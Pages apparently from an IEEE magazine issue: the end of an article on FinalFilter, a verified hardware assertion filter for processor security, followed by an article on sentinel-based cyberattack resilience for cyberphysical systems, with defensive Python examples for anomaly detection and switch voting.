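    "jointly_unsatisfiable": [("X1", lambda e: e["sm_rise"], lambda e: e["rst"]),
                              ("X2", lambda e: e["sm_rise"], lambda e: not e["rst"]),
                              ("X3", lambda e: True, lambda e: e["sm_rise"])],
}


def config_demo() -> Dict[str, List[str]]:
    out = {"a0": check_configuration(ATOMS, A0_COMPONENTS)}
    out.update({k: check_configuration(ATOMS, v) for k, v in BAD_CONFIGS.items()})
    return out
```

The running example passes all four checks, while each constructed configuration trips exactly the check it was built for; the "jointly unsatisfiable" case shows why the whole-set check is needed, since each of its three assertions is fine on its own.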

We note that while we formally verify the functional correctness of each module in the filter, we manually audit the connection between modules. That is, we manually check that every module's output signals are appropriately tied to the next module's input signals. There is no logic involved in the composition, and our naming convention made the checks straightforward. Our end-to-end verification of the invalid configuration signals, mentioned above, does not rely on this manual audit.

EVALUATION

To evaluate the performance and efficacy of FinalFilter, we implement it inside the OR1200 processor. The OR1200 is an open-source, 32-bit RISC processor with a five-stage pipeline, separate data and instruction caches, and MMU support for virtual memory. It is popular as a research prototype and has been used in industry as well;7 it is representative of what you would see in a mid-range phone today.

We wrote a program that automatically generates the FinalFilter hardware for a given number of Assert blocks to support. Generating the hardware programmatically makes it easy to explore the effect of tuning different parameters, and creates a regular naming and connection pattern that allows us to verify the structural connections of arbitrary filters using an induction-type approach.

For a complete system capable of booting Linux, we implemented the processor and filter combination as the heart of a system-on-chip that includes DDR2 memory, an Ethernet controller, and a UART controller. We implemented the system-on-chip on the FPGA that comes with the Xilinx XUP-V5 development board. We conservatively clock the system at 50 MHz.

Hardware Area Overhead

Figure 3 shows how the hardware area overhead changes as the number of assertions supported by FinalFilter increases. We built filters with support for as few as 1 assertion and as many as 17 assertions (the number required to protect all AMD processors we analyzed in our previous study on security-critical processor bugs5).

The figure contains data at four points in the fabric design space:

1. None. No optimization; this favors expressibility over overhead.

2. One State. This optimization uses Logic blocks with only one state input. Logic blocks were the biggest contributor to the area of the fabric and 83% of our security-critical invariants used only one input to the Logic block. This also reduces the number of required Routing blocks by 50%.

3. Top six. This optimization replaces the Routing blocks with new Routing blocks capable of handling the six most frequently used state elements. We observe that 76% of invariants require the same six ISA-level state items.

4. Both. This includes the two previous optimizations.

USING FINALFILTER

Using FinalFilter requires having a meaningful set of properties to monitor. In prior work, we took a manual approach to developing a set of security-critical properties.5 We studied errata documents to learn what types of exploitable errors can occur, and we studied the architecture's specification documents to develop a set of properties necessary, though not sufficient, to protect the security-critical state of the processor.

In subsequent work, one of the authors has developed a semiautomated method for learning new security properties using information gleaned from known exploitable bugs,8 and demonstrated that properties developed for one RISC processor may be suitable for use, after some translation, on a second RISC processor, even across architectures.9 However, the development of security-critical properties for use with FinalFilter, or with any property-based verification method, is still in its infancy, and more research is needed.

Case Study

We configured FinalFilter with 18 assertions we found to be critical to security in our prior work.5 We then introduced into the processor 14 vulnerabilities from a mix of previously published hardware attacks and attacks based on exploitable vulnerabilities from several years of AMD processor errata. For each one, we wrote a user-space program that exploits the vulnerability and reports whether the attack was successful. FinalFilter is expressive enough to implement all 18 invariants, and the configured filter detects all of the attacks.

FIGURE 3. Hardware overhead with respect to the number of assertions supported by the configurable assertion fabric, evaluated at four optimization levels. The range in the number of assertions represents the range in protection required by the processors in our analyzed set from AMD. The vertical line represents the average number of assertions required to protect the processors in our analyzed set. As a reference point, previous work on deployed-bug patching entails hardware overheads of up to 200% and run time overheads of up to 100% in the common case.


PRIOR WORK IN DYNAMIC VERIFICATION

FinalFilter builds on a line of research that uses dynamic verification to catch and patch functional bugs postdeployment. For example, DIVA10 is a simplified checker core that verifies the computation results of the full-featured core before the processor commits the results to the ISA level. Narayanasamy et al.11 use instruction rewriting routines to avoid triggering a bug that is found postdeployment.

In this article, we have not addressed the problem of measuring coverage. Boulé et al.12 add circuitry to assertions to track and measure coverage. The question of what is a meaningful coverage metric for a set of security properties is an open one, but it is critical: such a measure can give an indication of the number of "unknown unknowns" that remain unprotected.

CONCLUSION

Design-time verification alone is insufficient; some exploitable vulnerabilities will make it through. FinalFilter, a last line of defense, and one that can be formally verified, protects security-critical properties of the processor core. We believe the idea is broadly applicable, and in future work we will be exploring the use of a final filter for commercial architectures and for modules outside the processor core.

ACKNOWLEDGMENT

The authors would like to thank the editors for their insightful comments and suggestions, and S. Bellovin for his advice and the phrase "final filter."

REFERENCES

1. M. Hicks, M. Finnicum, S. T. King, M. M. K. Martin, and J. M. Smith, "Overcoming an untrusted computing base: Detecting and removing malicious hardware automatically," in Proc. IEEE Symp. Secur. Privacy, 2010, pp. 159–172.

2. J. Zhang, F. Yuan, L. Wei, Z. Sun, and Q. Xu, "VeriTrust: Verification for hardware trust," in Proc. ACM Des. Autom. Conf., 2013, pp. 61:1–61:8.

3. A. Waksman, M. Suozzo, and S. Sethumadhavan, "FANCI: Identification of stealthy malicious logic using Boolean functional analysis," in Proc. ACM Conf. Comput. Commun. Secur., 2013, pp. 697–708.

4. M. Bilzor, C. Irvine, T. Huffmire, and T. Levin, "Security checkers: Detecting processor malicious inclusions at runtime," in Proc. IEEE Int. Symp. Hardware-Oriented Secur. Trust, 2011, pp. 34–39.

5. M. Hicks, C. Sturton, S. T. King, and J. M. Smith, "SPECS: A lightweight runtime mechanism for protecting software from security-critical processor bugs," in Proc. ACM Int. Conf. Architectural Support Program. Lang. Oper. Syst., 2015, pp. 517–529.

6. A. Waksman and S. Sethumadhavan, "Silencing hardware backdoors," in Proc. IEEE Symp. Secur. Privacy, 2011, pp. 49–63.

7. R. Rubenstein, "Open source MCU core steps in to power third generation chip," Jan. 2014. [Online]. Available: http://www.newelectronics.co.uk/electronics-technology/open-source-mcu-core-steps-in-to-power-third-generation-chip/59110/

8. R. Zhang, N. Stanley, C. Griggs, A. Chi, and C. Sturton, "Identifying security critical properties for the dynamic verification of a processor," in Proc. ACM Int. Conf. Architectural Support Program. Lang. Oper. Syst., 2017, pp. 541–554.

9. R. Zhang, C. Deutschbein, P. Huang, and C. Sturton, "End-to-end automated exploit generation for diagnosing processor designs," in Proc. IEEE/ACM Int. Symp. Microarchit., 2018, pp. 815–827.

10. T. M. Austin, "DIVA: A reliable substrate for deep submicron microarchitecture design," in Proc. IEEE/ACM Int. Symp. Microarchit., Haifa, Israel, Nov. 1999, pp. 196–207. [Online]. Available: http://www.eecs.umich.edu/~taustin/papers/MICRO32-diva.pdf

11. S. Narayanasamy, B. Carneal, and B. Calder, "Patching processor design errors," in Proc. IEEE Int. Conf. Comput. Des., Oct. 2006, pp. 491–498. [Online]. Available: http://cseweb.ucsd.edu/~calder/papers/ICCD-06-HWPatch.pdf

12. M. Boulé, J. Chenard, and Z. Zilic, "Adding debug enhancements to assertion checkers for hardware emulation and silicon debug," in Proc. IEEE Int. Conf. Comput. Des., 2006, pp. 294–299.

CYNTHIA STURTON is an assistant professor and Peter Thacher Grauer Fellow at the University of North Carolina at Chapel Hill. She leads the Hardware Security @ UNC research group to investigate the use of static and dynamic analysis techniques to protect against vulnerable hardware designs. Her research is funded by several National Science Foundation awards, the Semiconductor Research Corporation, Intel, a Junior Faculty Development Award from the University of North Carolina, and a Google Faculty Research Award. She was recently awarded the Computer Science Departmental Teaching Award at the University of North Carolina. She has a BSE from Arizona State University and an MS and a PhD from the University of California, Berkeley. Contact her at [email protected].

MATTHEW HICKS is an assistant professor at Virginia Tech, working at the intersection of security, architecture, and embedded systems, with special emphasis on analog-domain hardware security. Contact him at [email protected].

SAMUEL T. KING was a professor for eight years at the University of Illinois Urbana-Champaign. He then left his tenured position at UIUC to push himself intellectually and professionally in industry. He is currently with the Computer Science Department at the University of California, Davis. He is interested in building systems for fighting fraud and rethinking our notion of digital identity. He has a PhD from the University of Michigan, an MS from Stanford University, and a BS from UCLA. Contact him at [email protected].

JONATHAN M. SMITH is currently a program manager in the Information Innovation Office (I2O) at the Defense Advanced Research Projects Agency (DARPA), on leave from the University of Pennsylvania, where he holds the Olga and Alberico Pompa Professorship of Engineering and Applied Science and is a professor of computer and information science. He was previously a Member of Technical Staff at Bell Telephone Laboratories and Bell Communications Research, joining Penn in 1989 after receiving his PhD from Columbia University. He previously served as a Program Manager at DARPA in 2004–2006 and was awarded the Office of the Secretary of Defense Medal for Exceptional Public Service in 2006. He became an IEEE Fellow in 2001. Contact him at [email protected].


August 2020 Published by the IEEE Computer Society 2469-7087/20 © 2020 IEEE

EDITORS: Mohamed Kaâniche, [email protected]; Richard Kuhn, [email protected]

DEPARTMENT: RESILIENT SECURITY

Cyberattack-Resilient Cyberphysical Systems

Barry M. Horowitz, University of Virginia

A great deal of attention is currently being placed on the development of advanced automation for physical systems, including a wide array of applications such as automobiles, unmanned air vehicles (UAVs), the Internet of Things, and 3D printers. These automation opportunities introduce cyberattack risks that can lead to loss of human life or serious injury. The cyberattack risks related to physical systems first received national attention in 2011 due to the Stuxnet cyberattack, which disrupted Iranian uranium-enrichment centrifuges.1

General recognition of the continuously growing cyberattack risk situations has led a University of Virginia (UVA) research team to conduct studies that address providing cyberattack-resilient designs for cyberphysical systems that can complement solutions that seek to provide defense against cyberattacks. Since 2011, the UVA team, under my direction, has been engaging in research efforts exploring 1) system architectures for achieving resilience, 2) system methodologies and analysis tools for prioritizing resilience solutions, and 3) the roles and procedures for engaging operators in the real-time management of system reconfigurations that provide resilience. The methods have been demonstrated to be effective across a broad range of applications, including UAVs, automobiles, 3D printers, and others. This article describes this comprehensive approach to resilience in cyberphysical systems and research advances on the horizon.

DEFINING RESILIENCE

System engineers have been designing resilient electronic systems for many years (e.g., air traffic control systems and military nuclear weapon command and control systems), employing what is referred to as diverse redundancy to permit dynamic reconfigurations of an abnormally behaving system. Diverse redundancy is a system design methodology that employs alternate methods for reconfiguring and operating a system under circumstances where the normal modes of operation become inoperable. In 2009, Rieger et al.2 defined resiliency as the capacity of a system to maintain state awareness and to proactively maintain a safe level of operational normalcy in response to anomalies, including threats of a malicious and unexpected nature.

To provide cyber resiliency, a system must be designed to include a monitoring process related to cyberattacks and alternate diverse sets of hardware and software that, when called upon, would permit continued operation of the system. For the research efforts reported on in this article, a system architecture that includes the required anticipatory processes for monitoring and reconfiguration control is provided by a subsystem referred to as a sentinel, which, to be viable for its role, should be designed to be far more secure than the system being addressed for resiliency.3 While the sentinel-based cyberattack detection process is expected to be automated, the level of reconfiguration automation may vary across system functions:

› Totally automated: Sentinel determines what to do and informs appropriately trained system operators regarding automated execution.

› Semiautomated: System operators receive automated recommendation(s) from the sentinel and, accounting for both situation context and a broader set of information available to them, decide on what to do.

› Manual: Operators, or higher levels in the system control hierarchy, determine what to do.

This article originally appeared in IEEE Security & Privacy, vol. 18, no. 1, 2020. Digital Object Identifier 10.1109/MSEC.2019.2947123. Date of current version: 23 January 2020.

In addition, resilience includes containing the immediate consequences of the detected attack and postattack forensic support based upon the data collected for addressing anomalies. Figure 1 provides a representation of a sentinel-based system architecture for providing cyberattack resilience. The employed system architectural approach is referred to as system-aware cybersecurity because attack detection methods are based upon discovery of system operational symptoms that would likely result from successful cyberattacks.

Figure 2 provides a more detailed representation of sentinel functions. As illustrated in the figure, the sentinel is connected to system interfaces from which it receives the data to support its monitoring function. The design of the communication interfaces depends upon a variety of factors, ranging from wired to wireless communications with a selection of protocols that depend upon the data to be sent and the formats and protocols of the functional subsystems to be monitored. The sentinel must then condition the diverse sets of collected data so that they can be integrated and analyzed. This includes setting appropriate data rates, data formats, and communication protocols for use within the sentinel.

Once the data to be analyzed for resilience purposes are ready for use, the sentinel performs the specific analyses required for detection of a cyberattack and determination of the location within the protected system that is under attack. When an attack is detected, the sentinel must prepare messages for the system users containing information regarding the detected attack and the steps required to reconfigure the system for continued operation. These messages must then be assembled for communication and computer control of the subsystems involved in the resilience-related reconfiguration solution.

In addition, the sentinel must prepare and disseminate its results for users engaged in more strategic roles (e.g., machine-learning purposes, forensics, etc.) related to managing resilience. There are a wide variety of possibilities for the hardware/software design of sentinels that are dependent on the system being supported. For example, implementation can be through a single computing node or through a highly distributed set of nodes, and selection of the design should be highly dependent on the methods of security that can be applied for protection of the sentinel (see the "Cyberattack Protection for the Sentinel" section).

FIGURE 1. The architecture of sentinel-based cyberattack resilience. [Diagram: the most highly secured component, the sentinel providing system-aware security, takes internal measurements from the system to be protected (including its diverse redundancy) and issues internal controls and reconfiguration controls; the protected system produces the outputs.]

FIGURE 2. The sentinel data flow. [Diagram: sensors, system control information, and mass storage in the system to be protected feed the sentinel over systems communication channels; within the sentinel, data conditioning, data integration, data analysis, and decision making lead to actions (forward data, isolate threat, restore system) sent over security communication channels to the reconfigurable diverse redundant components.]

The anticipated value of employing this type of resilience solution is that it requires the cyberattacker both to understand how the system to be attacked is designed and to develop and employ multiple attacks on diversely redundant subsystems to sufficiently disrupt the targeted system. This, in turn, should impact the cost, time, technical complexity, and risk of creating the desired cyberattacks, with the objective of deterring attackers from going ahead with their desire to be disruptive. Of course, the resilience solution must be sufficiently low cost, timely, low risk, and effective to make it an attractive option.

DETECTING SUCCESSFUL CYBERATTACKS

In this section, I describe mechanisms for cyberattack detection by a sentinel subsystem. To provide quality and cost advantages, the suggested system-aware design approach includes reusable design patterns for detecting successful cyberattacks. Example attack detection design patterns include:

1. discovery of data inconsistencies within the system with no other explainable cause (e.g., operator system control inputs are different from the inputs received by the related controlled subsystems, diverse sensors provide inconsistent measurements)

2. detection of changes of system operational parameters without authorized and operationally correct procedures, resulting in significant performance consequences (e.g., changes to navigation waypoints in a UAV resulting in modification of a UAV's route, changes to the detection threshold values in a radar system resulting in modification of false alarm/missed detection rates for that radar system, changes in the selection of transmission power levels in a software-controlled radio system that cause communication range and radio interference problems)

3. recognizing significant unexplainable incompatibilities between internal system communication levels and the presentation of situation awareness information provided to system operators (e.g., an air defense system operator is provided with low levels of traffic information, but sensors are observed to be communicating information that should be presented at high rates).

While each of these examples applies to a wide variety of physical systems, the implementation of specific solutions will vary across different systems.
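The first two detection patterns applied to a constructed UAV telemetry stream, as an added example written for this page (not code from the UVA sentinel prototypes): the record layout and field names, the 25-m GPS/INS tolerance, and the use of a procedure token to mark an authorized waypoint change are assumptions made for the illustration.

```python
"""Sentinel detection patterns 1 and 2 over a UAV telemetry stream (added example).

Pattern 1: data inconsistencies with no other explanation (the operator's command differs
from what the controlled subsystem received; diverse sensors disagree).
Pattern 2: an operational parameter (the active waypoint) changed without an
authorized procedure.  Record layout, field names, the GPS/INS tolerance and the
procedure token used to mark an authorized change are this example's assumptions.
"""
import math
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

Point = Tuple[float, float]   # local planar coordinates in metres


@dataclass(frozen=True)
class Telemetry:
    t: float                     # seconds since mission start
    commanded_wp: Point          # waypoint the operator console reports having sent
    received_wp: Point           # waypoint the autopilot reports as active
    change_token: Optional[str]  # token issued by an authorized waypoint-change procedure, if any
    gps_pos: Point               # position from GPS
    ins_pos: Point               # position from inertial navigation


@dataclass(frozen=True)
class Alert:
    t: float
    pattern: int                 # 1 = data inconsistency, 2 = unauthorized parameter change
    detail: str


class Sentinel:
    def __init__(self, initial_wp: Point, authorized_tokens: Set[str], sensor_tolerance_m: float = 25.0):
        self.active_wp = initial_wp
        self.authorized = set(authorized_tokens)
        self.tol = sensor_tolerance_m

    def inspect(self, rec: Telemetry) -> List[Alert]:
        alerts: List[Alert] = []
        # Pattern 1: the operator's control input is not what the controlled subsystem holds.
        if rec.commanded_wp != rec.received_wp:
            alerts.append(Alert(rec.t, 1, f"console sent {rec.commanded_wp}, autopilot holds {rec.received_wp}"))
        # Pattern 1: diverse sensors (GPS vs. INS) disagree beyond tolerance.
        gap = math.hypot(rec.gps_pos[0] - rec.ins_pos[0], rec.gps_pos[1] - rec.ins_pos[1])
        if gap > self.tol:
            alerts.append(Alert(rec.t, 1, f"GPS/INS positions differ by {gap:.0f} m"))
        # Pattern 2: the active waypoint changed without an authorized procedure.
        if rec.received_wp != self.active_wp:
            if rec.change_token not in self.authorized:
                alerts.append(Alert(rec.t, 2, f"waypoint changed to {rec.received_wp} without authorized procedure"))
            self.active_wp = rec.received_wp    # track the new value either way
        return alerts


def run(records: List[Telemetry], initial_wp: Point, authorized_tokens: Set[str]) -> List[Alert]:
    sentinel = Sentinel(initial_wp, authorized_tokens)
    alerts: List[Alert] = []
    for rec in records:
        alerts.extend(sentinel.inspect(rec))
    return alerts


# Constructed stream: steady flight, an authorized re-route at t=1, an injected
# waypoint the console never sent at t=3, and a GPS/INS split at t=4.
SAMPLE = [
    Telemetry(0.0, (0, 0), (0, 0), None, (10, 10), (12, 9)),
    Telemetry(1.0, (500, 0), (500, 0), "proc-7F3A", (40, 11), (41, 12)),
    Telemetry(2.0, (500, 0), (500, 0), None, (70, 12), (72, 11)),
    Telemetry(3.0, (500, 0), (900, 400), None, (100, 13), (101, 12)),
    Telemetry(4.0, (500, 0), (900, 400), None, (130, 14), (400, 300)),
]

if __name__ == "__main__":
    for a in run(SAMPLE, (0, 0), {"proc-7F3A"}):
        print(f"t={a.t:>4}  pattern {a.pattern}: {a.detail}")
```

The authorized re-route at t=1 raises nothing because the console and autopilot agree and the change carries a token from a known procedure; the injected waypoint at t=3 trips both patterns at once, which is the kind of corroboration an operator would want before reconfiguring.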

FIGURE 3. The technical configuration for the hopping/voting resilience design pattern for ship propulsion control. [Diagram: Engine 1 and Engine 2, each with its own propulsion controller and operator interface, connected through a hopper/voter to three network switches of different models (A, B, and C).]


The system-aware research efforts have included prototype designs that employed the example design patterns described previously, as well as others, for detecting cyberattacks on UAVs, police cars, 3D printers, and military systems. Note that the consequences of a cyberattack can vary significantly depending upon the actual system being attacked, so risk-based decisions are required in terms of which design patterns reduce the risks of attack most significantly. Furthermore, as noted previously, resilient system efforts must be directed toward achieving designs that are highly secured.

SYSTEM RECONFIGURATION SOLUTIONS

As illustrated earlier in discussing reusable design patterns for cyberattack detection, designs that exploit diverse redundancy for continuing operation are also reusable, but implementation and risk reduction value depend upon the actual system to be protected. In addition, diverse solutions typically do not perform as well as the normal mode of system operation, although they are potentially acceptable for continuing operation. Examples of diverse redundancy opportunities include the following:

› use of diverse sensors for providing situation awareness information (e.g., radar, infrared, audio, video, and many other technologies that can potentially be used as the basis for surveillance subsystems)

› use of diverse navigation subsystems (e.g., GPS, inertial navigation)

› use of relatively common subsystems, but designed and produced with different hardware and software by different manufacturers (e.g., different operating systems, application software, microelectronics components, communications switches).

As a result, designers of resilient systems must evaluate the losses in performance that could result when the protected system is reconfigured and the operational acceptability of such losses.

Resilience can also be achieved through the integration of multiple approaches for achieving diversity that serve both detection of attacks and reconfiguration responses. For example, one of the design patterns derived from UVA's research efforts is referred to as configuration hopping with voting. An experimental application of this design pattern, utilizing multivariant programming4 via the use of three diversely manufactured communication switches and through comparison of message content going into and coming out of the switches, could determine if there was an inappropriately performing switch. If so, the improperly performing switch could be taken out of service while continuing system operation.

In addition, to make matters more complex for a cyberattacker intent on changing message content, the design pattern included the use of a moving target technique,5 dynamically changing which switch is operationally employed once every few seconds, with randomly selected times for moving the potential targets. Since the diversely implemented switches were not closely synchronized in terms of the order of messages and their timing, the use of moving target defense brought with it the potential to create problems due to the timing of message processing within the diverse switches. To address this problem, message content comparisons were done in a batched manner at sufficiently spaced intervals (e.g., 20-s intervals) so as to reduce the percentage of deviating messages due to timing. The sentinel detection algorithms were designed to permit missing messages as a normal situation when the deviations occurred close to the switching times, and the operational system depended on its existing communication protocols to assure that missing messages due to dynamic changing of the switch in operation were either re-sent in a timely manner or were acceptable for loss at low rates.6

Operational prototype-based experiments related to control of a ship's propulsion system were conducted to measure message loss rates. Results indicated that the number of lost messages due to a 20-hop/s resilience design was acceptably low (for a 250-Mb/s data rate involving 1-Kb User Datagram Protocol-formatted packets, results showed packet loss rates of fewer than two packets per 10,000 transmitted packets, and that operators could dependably continue to carry out their propulsion control-related responsibilities with the reduced level of communication system performance).
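The hopping-with-voting pattern from the two paragraphs above, as an added example written for this page rather than code from the UVA prototype: three switches carry the same message stream, a batched vote compares payloads by sequence number, a switch whose content deviates from the majority is quarantined, and a message missing from one switch is counted only when it was not sent within a grace window of a hop. The message format, the 0.5-s grace window, the 2–5 s random hop spacing, and the sample batch are assumptions.

```python
"""Configuration hopping with voting over diverse switches (added example, not UVA code).

Three switches of different make process the same message stream.  The sentinel
batches what each switch emitted over an interval, votes per sequence number, and
quarantines any switch whose payload deviates from the majority.  A message missing
from one switch is counted only when it was not sent within `grace` seconds of a hop,
since losses around a hop are expected and left to the transport to recover.
Message format, timings and the sample batch are this example's assumptions.
"""
import random
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

Msg = Tuple[float, bytes]   # (send time in seconds, payload)


class HoppingVoter:
    def __init__(self, switch_ids: List[str], hop_grace_s: float = 0.5, seed: int = 1):
        self.healthy = list(switch_ids)     # switches still trusted to carry traffic
        self.quarantined: List[str] = []
        self.active = self.healthy[0]       # switch whose output the system currently uses
        self.hop_times: List[float] = []
        self.grace = hop_grace_s
        self.rng = random.Random(seed)      # randomized hop times and targets (moving target)

    def hop_schedule(self, duration_s: float, lo: float = 2.0, hi: float = 5.0) -> List[float]:
        """Randomly spaced hop times covering an interval: 'once every few seconds'."""
        times, t = [], 0.0
        while True:
            t += self.rng.uniform(lo, hi)
            if t >= duration_s:
                return times
            times.append(t)

    def hop(self, now: float) -> str:
        """Move live traffic to a randomly chosen other healthy switch."""
        others = [s for s in self.healthy if s != self.active] or self.healthy
        self.active = self.rng.choice(others)
        self.hop_times.append(now)
        return self.active

    def near_hop(self, t: float) -> bool:
        return any(abs(t - h) <= self.grace for h in self.hop_times)

    def vote(self, batches: Dict[str, Dict[int, Msg]], now: float) -> Tuple[List[str], Dict[str, int]]:
        """Compare one batch interval; return (switches quarantined, unexplained losses)."""
        by_seq: Dict[int, Dict[str, Msg]] = defaultdict(dict)
        for sw, msgs in batches.items():
            if sw in self.healthy:
                for seq, msg in msgs.items():
                    by_seq[seq][sw] = msg
        disagree: Counter = Counter()
        missing: Counter = Counter()
        for obs in by_seq.values():
            payload, votes = Counter(m[1] for m in obs.values()).most_common(1)[0]
            if votes < 2:
                continue                    # no quorum: cannot say which switch is wrong
            t_sent = min(m[0] for m in obs.values())
            for sw in self.healthy:
                if sw not in obs:
                    if not self.near_hop(t_sent):
                        missing[sw] += 1
                elif obs[sw][1] != payload:
                    disagree[sw] += 1
        bad = [sw for sw in self.healthy if disagree[sw]]
        for sw in bad:                      # take the deviating switch out of service
            self.healthy.remove(sw)
            self.quarantined.append(sw)
        if self.active not in self.healthy and self.healthy:
            self.hop(now)                   # live traffic was on a bad switch: move it now
        return bad, dict(missing)


def constructed_batch() -> Dict[str, Dict[int, Msg]]:
    """Constructed interval: A and C agree, B rewrote message 3, C lost message 5 at t=2.1."""
    truth = {1: (0.1, b"RPM=1200"), 2: (0.6, b"RPM=1200"), 3: (1.1, b"RPM=1250"),
             4: (1.6, b"RPM=1250"), 5: (2.1, b"RPM=1300"), 6: (2.6, b"RPM=1300")}
    b = dict(truth)
    b[3] = (1.15, b"RPM=3000")             # tampered content on switch B
    c = dict(truth)
    del c[5]                                # dropped by switch C right after a hop at t=2.0
    return {"A": dict(truth), "B": b, "C": c}


if __name__ == "__main__":
    voter = HoppingVoter(["A", "B", "C"])
    voter.hop(2.0)                          # a hop happened at t=2.0 inside this interval
    print(voter.vote(constructed_batch(), now=20.0))   # (['B'], {})
```

Once a switch has been quarantined only two remain, so the vote can still notice a disagreement but no longer attribute it; that is the point at which the operator procedures of the following sections take over.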


CYBERATTACK PROTECTION FOR THE SENTINEL

A significant design issue regarding achieving cyberattack resilience for the protected system is the security designed into the sentinel, which can consist of a combination of both cyberattack defense and resilience solutions. The UVA design concept for sentinels builds on the engineering principle that they should be far less complex than the subsystems they protect, so as to provide the opportunity for employment of advanced security techniques that are limited in the scale and complexity of their application, such as software verification technologies applied for development and testing of sentinel software and software execution-related security techniques employed at the microelectronics level. For example, Draper Laboratory is currently engaged in research activities focused on achieving system security through hardware and firmware.11

In addition, the cost of applying diverse redundancy-based resilience to the sentinel itself can then be addressed within more acceptable cost boundaries. The UVA research efforts included operational demonstrations of prototypes that employed multivariant programming and moving target defenses within a sentinel design. These techniques could be employed effectively because the sentinels were designed to consist of detection algorithms that were each implementable with fewer than 1,000 lines of code. The research served to support the concept that simple designs can indeed provide effective system resilience solutions and the basis for greater trust in the sentinel than would otherwise be possible.

RISK-BASED PRIORITIZATION OF ALTERNATIVE RESILIENCE SOLUTIONS

A critical aspect of cyberattack-resilient system design is the prioritization and selection of alternative system solutions. Part of the UVA research effort has focused on the development of a risk-based methodology for prioritizing potential solutions. Referred to as the cybersecurity requirements methodology (CSRM), the process for prioritizing potential system solutions involves collaboration among three small groups of participants (two to three members per group) and requires approximately two months of effort to develop the results. The three groups are

› the blue team, consisting of individuals with significant operational experience regarding systems in the domain of the specific system under consideration for resilience solutions

› the red team, consisting of individuals with combined experience in both cybersecurity defense and offense

› a system engineering (SE) team, with experience in development of system requirements related to resilience.

Cyberattack risk analysis involves identification of potential system problems that can result in significant consequences and the likelihood of these problems occurring. The CSRM approach looks to the blue team to identify and prioritize potential system problems related to the operation of system functions and the corresponding consequences related to these problems that are of greatest concern.

The identified problems can range from functions being implemented improperly, to deviations from the technical performance specifications, to loss of functions (note that the blue team is not asked to relate the problems of concern to cyberattacks, but to any functional issue associated with the system's hardware, software, or operational procedures). UVA's CSRM research project included a case trial, discussed next, for which the U.S. Army provided the blue team. The SE team is called upon to derive system-level descriptions of potential cyberattack-resilient solutions that would address the higher-consequence concerns expressed by the blue team. A critical aspect of the SE team's effort is to utilize rapid prototyping as a mechanism for addressing the operational issues regarding the role of the human operators in reconfiguration decision making and execution of switchovers. To arrive at viable operational solutions, the SE team is expected to coordinate and adjust its resilience solutions based upon suggestions from the blue team.

For the use case trial, members of UVA and Virginia Commonwealth University (VCU) served as the SE team. To assure sufficient specificity in the resulting SE system descriptions, SysML, a formal approach that employs available support tools for describing systems, is used. The use of such tools is an important ingredient of assuring that high-priority solutions will be properly understood by the red team and, if selected for implementation, designed as intended. The red team is provided with the SE team's potential solution descriptions and is called upon to evaluate how each of them would potentially impact the decisions of cyberattackers, based upon the added complexity of attacks, extended time to implement and test attacks, cost of attacks, risk of discovery, and so forth.

The red team is also called upon to evaluate the potential effectiveness of the resilience solutions, compared to use of additional conventional cyber defense solutions, and to assess the potential for a cyberattack to disrupt the detection or reconfiguration functions of the potential resilience solutions.

An important aspect of CSRM is the use of existing historical databases, openly available through the MITRE Corporation, related to cyberattacks and their causes and the use of a UVA/VCU set of analysis tools intended to support the red team’s analysis efforts. The red team members combine their analyses to prioritize the SE team’s suggested resilience solutions based upon the influence on attack likelihoods and the advantage offered compared to extended use of cyberattack defense solutions. The SE team uses the red team results to modify its proposed designs and to suggest a prioritization based upon the integrated assessments of the blue and red teams.

The three teams together finalize their integrated prioritization, and the SE team modifies its SysML system description of the recommended, highest-priority resilience solutions. This result, combined with cost assessments for each of the considered solutions, provides a basis for decision making regarding implementation of cyberattack resilience design features.

ROLE OF SYSTEM OPERATORS

An important aspect of designing cyberattack-resilient systems relates to the roles of the human system operators. An important aspect of the UVA research effort required the development of prototype resilient systems, including systems for UAVs and police cars. The prototype systems included the development of reconfiguration procedures for operators to follow in response to sentinel alerts.

Based upon use trials, it became apparent that uncertainties related to the reasons for the cyberattack can greatly influence the reconfiguration responses of operators. For example, consider a cyberattack that would change navigation waypoints for a UAV conducting a search and rescue mission. Possibilities related to the purpose of the attack can range from the attacker wishing to 1) disrupt that search and rescue mission, 2) disrupt the air traffic control system in the area surrounding the UAV, or 3) steal the UAV by directing it to a specific location.

The best response to the detected attack could be different depending upon the actual purpose of the attack, and the human operators may have a broader context of the risk posed by the detected attack than the sentinel that made the detection. UVA’s experimental research included the involvement of Air Force pilots remotely controlling UAVs and ground-based vehicles in simulated situations. Results have shown that operators can significantly delay resilience-related responses due to their uncertainty about how best to respond, and, in general, they are not prepared to confidently select sentinel-recommended solutions.12

To date, the experiments have proven to be very useful in illuminating issues that need attention related to operator response to detected cyberattacks, but the research has not yet matured to the point where specific human/machine team solution concepts are ready for recommendation. In addition to receiving continued research attention, over time, feedback from actual operational situations will need to be gathered to develop acceptable arrangements for operators to participate in system reconfiguration decision making related to cyberattacks.

Based upon the results gathered from the eight years of study conducted by UVA’s cyberattack resilience research team, the opportunity to employ cyberattack resilience capabilities in cyberphysical systems appears to be a promising complement to cyber defense solutions. It has been shown that simpler sentinel-based solutions can be candidates for immediate trial implementations, and it is suggested that this would be a productive step for introducing cyberattack resilience solutions into practice. However, while the UVA research efforts have demonstrated how resilience solutions can provide important benefits, continued research is needed. Research needs to include:

1. continued identification of cost-effective reusable resilience design patterns

2. development of analysis tools that support risk-related selection of solutions for employment as well as test and evaluation methodologies for candidate solutions

3. experimental-based efforts related to addressing operator roles and performance in decisions related to system reconfiguration

4. broadening resilience solutions to address information systems as well as physical systems

5. defining and implementing field data collection and evaluation methodologies to support improvement of machine algorithms and operator processes.

ACKNOWLEDGMENTS

This material is based, in part, upon work supported by the Stevens Institute of Technology through the Systems Engineering Research Center (SERC) under U.S. Department of Defense (DOD) Contract HQ0034-13-D-0004. SERC is a federally funded University Affiliated Research Center managed by Stevens Institute of Technology. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the DOD.

REFERENCES

1. N. Falliere, L. O. Murchu, and E. Chien, “W32.Stuxnet dossier,” Symantec Corporation, Mountain View, CA, 2011. [Online]. Available: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf

2. C. G. Rieger, D. I. Gertman, and M. A. McQueen, “Resilient control systems: Next generation design research,” in Proc. 2nd Conf. Human Systems Interactions, 2009, pp. 632–636.

